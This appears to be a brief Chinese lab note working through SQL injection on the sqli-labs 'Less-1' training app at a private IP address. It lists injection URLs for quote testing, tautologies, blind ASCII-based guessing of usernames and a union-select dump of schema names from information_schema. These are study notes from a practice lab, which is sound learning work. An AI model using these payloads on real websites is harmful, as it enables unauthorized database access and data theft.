1.注入测试
http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1'
http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1' or '1'='1
http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1' and '1'='2
数字型注入不能使用。考虑猜解,下面也有更好的方法
http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1' and (select * from Information_schema)>0 and ''='
猜出数据库
爆出用户名
http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=1' and (select count(*) from users where ascii(mid(username,1,1))=68) and ''='
方法2直接爆出
http://172.16.19.146:8080/sqli-labs-master/Less-1/?id=88888' union select 4,group_concat(schema_name),8 from information_schema.schemata -- and ''='
余下步骤见lesson2